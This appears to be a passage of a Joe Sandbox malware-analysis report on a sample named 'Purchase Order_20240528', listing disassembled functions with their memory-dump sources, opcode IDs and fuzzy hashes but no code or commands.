                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 85e2b40ac9149823dff6351afd40afd3593bb454de59936232a49ca4de6f114e
                                  • Instruction ID: 3d7818284ae2886dff8090155b55dfafd432529aed0e3b73c56604c72b6d14da
                                  • Opcode Fuzzy Hash: 85e2b40ac9149823dff6351afd40afd3593bb454de59936232a49ca4de6f114e
                                  • Instruction Fuzzy Hash: 6741BE3690021ADBDF10DFA9C840AEEB7B5BF48710F18815AF915EB344D7359D82CBA4
                                  Function 01622750 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction ID: 83b081ab69554c8a7b687b8eeb98bdd37082093e12bdf899a727ee43643fdec7
                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction Fuzzy Hash: 3B516A75A01615CFCB55CF98C880AAEFBB2FF84714F2482A9D915EB351D730AE42CB90
                                  Function 015E6154 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 837e493d3b5b1e6dbc7041aab40088dcfeb5335d765bc7cb8247af35b54e6c79
                                  • Instruction ID: f2e32aaa70341eef1df9e2dc3b22d059e1b30a5e8126c444475a14e0239876ca
                                  • Opcode Fuzzy Hash: 837e493d3b5b1e6dbc7041aab40088dcfeb5335d765bc7cb8247af35b54e6c79
                                  • Instruction Fuzzy Hash: 9D51D670D04257DBDB298B68CC08BE9BBF1FF65314F1482A9D6299B2D1D7749981CF80
                                  Function 015E0BCD Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7318c6999956ec2e56cb229939387676f16de171963f64bef61813b9e2120618
                                  • Instruction ID: 3ef39cde8eab8f1ed1f9662ae474138dccf907dc0798d650f16ff59c5ce896ca
                                  • Opcode Fuzzy Hash: 7318c6999956ec2e56cb229939387676f16de171963f64bef61813b9e2120618
                                  • Instruction Fuzzy Hash: 9C419F72E002299ADB25DF68CD44BEAB7B5FF85740F0104A9E908AF281D774DE81CF91
                                  Function 016A866E Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction ID: 9d47b3ecd8855027efe3da5236cad55e9dd56acb82ebfbcf2bd0d2806a22b42a
                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction Fuzzy Hash: 5741A375B00216ABEB15DF99CC84ABFBFBEAF88601F544069E904A7341DB70DD01CBA0
                                  Function 015E0887 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3737b72d952dae857b976cad2aa72fc6fc6b42ab4417e3262568bc696879daa
                                  • Instruction ID: 81066445f08cf49c01c6f3cbd82478471b4a4fbeefb0585656804f2132ea5a31
                                  • Opcode Fuzzy Hash: d3737b72d952dae857b976cad2aa72fc6fc6b42ab4417e3262568bc696879daa
                                  • Instruction Fuzzy Hash: EE41B4B0B007029FE729CF28C884926B7F9FF89314B104A6DE556CB690E7B0F845CB50
                                  Function 0160A470 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88022a760f39bc1200d7c2a331281012dd2e5580ef48afd5e92faa0db74d5874
                                  • Instruction ID: cb18cb512ece76be6ee999e2e1e017c031029d79e3739b4f5d239f5bb3fa9528
                                  • Opcode Fuzzy Hash: 88022a760f39bc1200d7c2a331281012dd2e5580ef48afd5e92faa0db74d5874
                                  • Instruction Fuzzy Hash: 5941BB32941205CFDB2ADFACDD94BAE7BB0FB98390F050199D415AB3D1DB369901CBA4
                                  Function 015E8BF0 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a647399d82b401e410b36cb99242fd7625bb1dd9c388c88f191b6057a1e4f94
                                  • Instruction ID: b814017fe17390505f7c911e028e9746abe6458154e27adb4396e75f2d51927b
                                  • Opcode Fuzzy Hash: 9a647399d82b401e410b36cb99242fd7625bb1dd9c388c88f191b6057a1e4f94
                                  • Instruction Fuzzy Hash: 7C41DD72E01202CBD7298F5CDD88B5ABBF6FBD5600F24846EE9059F665CB359842CB90
                                  Function 015D8918 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d01963dd91fff1fe0a12013f02b62765f2f8b200060abd9999a408fde3a27e1a
                                  • Instruction ID: 2f7e072e437f05ea0aaebfa30a7fc48f80226df80254b6d4d654e375480e1732
                                  • Opcode Fuzzy Hash: d01963dd91fff1fe0a12013f02b62765f2f8b200060abd9999a408fde3a27e1a
                                  • Instruction Fuzzy Hash: 74414A315087069ED322DF69CC40A6BB6E9FF84B54F41092EFA84DB250E730DE048BA7
                                  Function 015DA020 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction ID: d9b7fa67ce5bce83736aff3d4199e6274a0d2d35e263819d8c91ae1699f44b45
                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction Fuzzy Hash: CB411531A00212DBEB31DE6D88407BBBBA1FBD0754F15806EEA459F384D7328D80CB90
                                  Function 015E09AD Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b4a2d59875c2695f5cdb3d336f0fbf470b3c91ecfdffba45849d5142b915a6c
                                  • Instruction ID: b2671e36cb89fedcc12c5a919e8908892ff4d7f52d8affc73fa916c30f1536f0
                                  • Opcode Fuzzy Hash: 1b4a2d59875c2695f5cdb3d336f0fbf470b3c91ecfdffba45849d5142b915a6c
                                  • Instruction Fuzzy Hash: 47417D71A00606DFD725CF18C844B2ABBF5FF98314F24896AE559CF291E7B1E942CB90
                                  Function 01610710 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction ID: 366753cc5599d79a278ea821ec40b10fa59a1b7c514bbfb5789244287c2db0fb
                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction Fuzzy Hash: 9D414B75A04705EFDB24CF98C980AAABBF8FF18700B14496DE556DB254D330EA85CF90
                                  Function 0161C8F9 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b691d5422f2563d81a84a7669b0554fda4c76043e46729d60afdbce55c32c427
                                  • Instruction ID: 2e330846878b32f5bf5b84cea9f872be9f8b0c45c94b11e7cff78d445f219137
                                  • Opcode Fuzzy Hash: b691d5422f2563d81a84a7669b0554fda4c76043e46729d60afdbce55c32c427
                                  • Instruction Fuzzy Hash: D431A7B2A41246DFDB52CFA8C840798BBF1FB48724F2484AED519EB351D3329902CB90
                                  Function 015D80A0 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d2c8423da2c276085a00c2056a37133c2aa5c61f2f2189193cf3c3f9be228ae
                                  • Instruction ID: d6ce2fe513f84cdec9d2200e900357972fda1b1249056549a96e03dd303414af
                                  • Opcode Fuzzy Hash: 2d2c8423da2c276085a00c2056a37133c2aa5c61f2f2189193cf3c3f9be228ae
                                  • Instruction Fuzzy Hash: 1B41C271E05616AFDB21DFACCC80AACB7B1BB94760F148629D815AB280D734ED458BD0
                                  Function 016605A7 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 425da8c866e15a7fc6a348ed83692cd3cf4bcd1c03dfa97f03b504784d0b01f8
                                  • Instruction ID: 86d144a3d0fb4ad75ce5499fa498598c18e0116ff9973d11f0364e30dd0e2f45
                                  • Opcode Fuzzy Hash: 425da8c866e15a7fc6a348ed83692cd3cf4bcd1c03dfa97f03b504784d0b01f8
                                  • Instruction Fuzzy Hash: 3041B1726046529FD320DF68CC40A6AB7A9FFC8700F14062DF954DB680E730ED04CBA6
                                  Function 015D8B50 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b61b82575fae270969bd58dc180c4ea1ea02701e462da54fd9670412bac593f
                                  • Instruction ID: e5655baa17eb9c5ab3d3753a16c877d677c70811b1a98b96edf45d2383401492
                                  • Opcode Fuzzy Hash: 5b61b82575fae270969bd58dc180c4ea1ea02701e462da54fd9670412bac593f
                                  • Instruction Fuzzy Hash: 30416DB1A01605DFDB25CF6DC98099DBBF1FF88320B14862AD466AF260DB34A941CF50
                                  Function 015F02E1 Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction ID: 5a4b162bb813502f2c61418f02af62324dcda9a32ffab7d05ed888f27daa104f
                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction Fuzzy Hash: 0D310431A04245ABDB218B68CC44BAFBBEAFF54350F0845A9F815DB392C6749844CBA4
                                  Function 0168E3DB Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 387c1e1eb766621ee6b0b34ba8999ecee03a91e970c8a9df1dc7944f753ba551
                                  • Instruction ID: aae89efffee793ed89ea076f92920e95e93c129831841c14c4c5830589c1c0f9
                                  • Opcode Fuzzy Hash: 387c1e1eb766621ee6b0b34ba8999ecee03a91e970c8a9df1dc7944f753ba551
                                  • Instruction Fuzzy Hash: EE31AA31B51716ABE722AF698C41F6F7AA9AF58B50F010068F604AB3D1DAA5DC01C7E4
                                  Function 01694B4B Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1463ae53d062034206b3dc82dd237bc18928f87a9c9cc9ac0c25912d0a35780a
                                  • Instruction ID: 85bc08869b4498a21f3353d5dc05bc5b466f4bfe37a880f0574275b66f43228c
                                  • Opcode Fuzzy Hash: 1463ae53d062034206b3dc82dd237bc18928f87a9c9cc9ac0c25912d0a35780a
                                  • Instruction Fuzzy Hash: 2E31AD72606201CFCB21DF1DDD80E26B7E9FB85360F0A446EE9998B355DB30E812CB91
                                  Function 015E4260 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbc1cad81b140f46f5bd3a94cedf3a931f746251398a8f9a68ec5dff7351ff93
                                  • Instruction ID: c91c27bd2b013ccd31f96bb679d134e02c3e847f744d90d1bfe4ddb696a01bb2
                                  • Opcode Fuzzy Hash: cbc1cad81b140f46f5bd3a94cedf3a931f746251398a8f9a68ec5dff7351ff93
                                  • Instruction Fuzzy Hash: DB419C31600B569FD726CF28C894BDB7BE5BB48314F01886DE6AACB290C774E840CB50
                                  Function 01694BB0 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a70b538ff8649983e8550eb7a5380ff4b4f9f7c2f41d774a6993a7c9f1b5ff1c
                                  • Instruction ID: 761c65fde8c025831fecfde22aabf66ecd4d6f5288d5e1b2557bfd94ca2b181a
                                  • Opcode Fuzzy Hash: a70b538ff8649983e8550eb7a5380ff4b4f9f7c2f41d774a6993a7c9f1b5ff1c
                                  • Instruction Fuzzy Hash: 06319C716052428FDB20DF28DD80A2AB7E9FB84720F05496DE9559B390EB30E806CB91
                                  Function 0165EB1D Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7af724461f1658db252691713c4ce46708828f1bb78230348b601159d274d6d8
                                  • Instruction ID: 26fb49bbd943ced114c097e4d39449446752615f95eb257369a78b0995656675
                                  • Opcode Fuzzy Hash: 7af724461f1658db252691713c4ce46708828f1bb78230348b601159d274d6d8
                                  • Instruction Fuzzy Hash: 7C31E4326016829BFB629B5CCE48B25FBD9BB40780F1D00B4AF458B7D2DB29D941C234
                                  Function 016A61C3 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 117c84726e6943111bdeda53efd60e1a93a62de19d122bf2e1c9d4804016ff27
                                  • Instruction ID: 7474619857065040538da7c68b4b0e5819903360a9ab4379659312a93da22a92
                                  • Opcode Fuzzy Hash: 117c84726e6943111bdeda53efd60e1a93a62de19d122bf2e1c9d4804016ff27
                                  • Instruction Fuzzy Hash: 58319275A00156ABDB15DF98CC40BAEB7B5FB44740F458169E900AB244D770AD41CFA4
                                  Function 0168483A Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd5145cdb793a8133fedaae87488057ace53938116d644058f92012852cd131d
                                  • Instruction ID: 903a69a756c61cb15f01e4ecff42d13d92d0502e60818f41cd1ac08c77aff5f8
                                  • Opcode Fuzzy Hash: cd5145cdb793a8133fedaae87488057ace53938116d644058f92012852cd131d
                                  • Instruction Fuzzy Hash: F3313276A4112EABCF31EF54DC84BDEBBB6AB98350F1501E5E508A7250DB309E91CF90
                                  Function 0160EB20 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
